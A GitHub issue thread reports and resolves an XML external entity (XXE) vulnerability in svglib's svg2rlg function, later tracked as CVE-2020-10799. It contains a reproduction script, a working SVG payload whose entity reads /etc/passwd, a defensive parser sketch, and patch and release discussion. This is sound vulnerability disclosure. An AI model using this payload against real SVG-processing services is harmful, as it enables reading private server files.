
No disabling external entity expansion (XXE) #229

Closed
MrLion9 opened this issue Feb 25, 2020 · 9 comments

Comments

MrLion9 commented Feb 25, 2020

Hi! I found that I can perform an XXE attack (https://en.wikipedia.org/wiki/XML_external_entity_attack) when using the svg2rlg function.

Code:

from svglib.svglib import svg2rlg
from reportlab.graphics import renderPM

def convert(image):  # image: SVG bytes supplied by the user (the payload shown below)
    image_path = "./test.svg"
    saved_image_path = "test_png.png"
    with open(image_path, "wb") as f:
        f.write(image)
    drawing = svg2rlg(image_path)  # the external entity is expanded here
    renderPM.drawToFile(drawing, saved_image_path, fmt="PNG")

Payload (test.svg)

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [
    <!ENTITY xxe SYSTEM "/etc/passwd">
]>
<svg width="10cm" height="3cm" viewBox="0 0 1000 300"
     xmlns="http://www.w3.org/2000/svg" version="1.1">
  <desc>Example text01 - 'Hello, out there' in blue</desc>

  <text x="250" y="150" 
        font-family="Verdana" font-size="55" fill="blue" >
    &xxe;
  </text>

  <!-- Show outline of canvas using 'rect' element -->
  <rect x="1" y="1" width="998" height="298"
        fill="none" stroke="blue" stroke-width="2" />
</svg>
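An added example, not code from svglib or from the reporter: the payload above parsed with Python's stdlib expat parser configured so that external entities are never read and every SYSTEM/PUBLIC entity declaration is reported back to the caller, who can then reject or log the file instead of rendering it. svglib itself parses with lxml, where the equivalent setting is XMLParser(resolve_entities=False); the stdlib version here needs no third-party package. Both SVG inputs are constructed for the example.

```python
import xml.parsers.expat as expat

# Constructed input: the payload from this issue, trimmed to the relevant parts.
SVG_WITH_XXE = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [
    <!ENTITY xxe SYSTEM "/etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
  <text x="250" y="150">&xxe;</text>
</svg>"""

# Constructed input: a benign SVG with the same structure and no DTD.
SVG_CLEAN = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
  <text x="250" y="150">Hello, out there</text>
</svg>"""


def parse_svg_safely(svg_bytes):
    """Return (text, external_entities, has_internal_subset).

    External entities are never read: the reference handler reports success
    without opening anything, so &xxe; expands to nothing, and parameter
    entity expansion is switched off. Declared SYSTEM/PUBLIC entities are
    collected so the caller can reject or log the file instead of rendering it.
    """
    texts, externals, dtd = [], [], {"internal_subset": False}
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        dtd["internal_subset"] = bool(has_internal_subset)

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            externals.append((name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    # Returning 1 tells expat the reference was handled; nothing is opened.
    parser.ExternalEntityRefHandler = lambda context, base, sys_id, pub_id: 1
    parser.CharacterDataHandler = texts.append
    parser.Parse(svg_bytes, True)
    return "".join(texts).strip(), externals, dtd["internal_subset"]


if __name__ == "__main__":
    for label, data in (("xxe", SVG_WITH_XXE), ("clean", SVG_CLEAN)):
        print(label, parse_svg_safely(data))
```

A renderer that refuses any document where external_entities is non-empty (or where an internal subset is present at all, since svglib has no use for one) closes the hole regardless of which XML library it sits on.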
@deeplook (Owner)

It would be nice to put a link like this with your description, if this is what you mean... https://en.wikipedia.org/wiki/XML_external_entity_attack

MrLion9 (Author) commented Feb 25, 2020

Yes, that’s what I meant )

@averonesis

Hello @deeplook, will you fix the issue?

claudep (Collaborator) commented Mar 6, 2020

Hello @averonesis, will you suggest a patch?

claudep added a commit to claudep/svglib that referenced this issue Mar 7, 2020
claudep (Collaborator) commented Mar 7, 2020

@MrLion9, could you have a look at the patch, please?

@averonesis

@claudep yep, looks good, thank you!

MrLion9 closed this as completed Mar 10, 2020
claudep (Collaborator) commented Mar 10, 2020

I guess you approved through emojis 😄
I am reopening, because closing should be done when the patch is merged.

claudep reopened this Mar 10, 2020
@NicoleG25

I believe that CVE-2020-10799 was assigned to this issue :)

claudep (Collaborator) commented Mar 22, 2020

I pushed both a 0.9.4 release to have a Python 2 compatible release with the fix and a 1.0.0 release which is now Python 2 free.
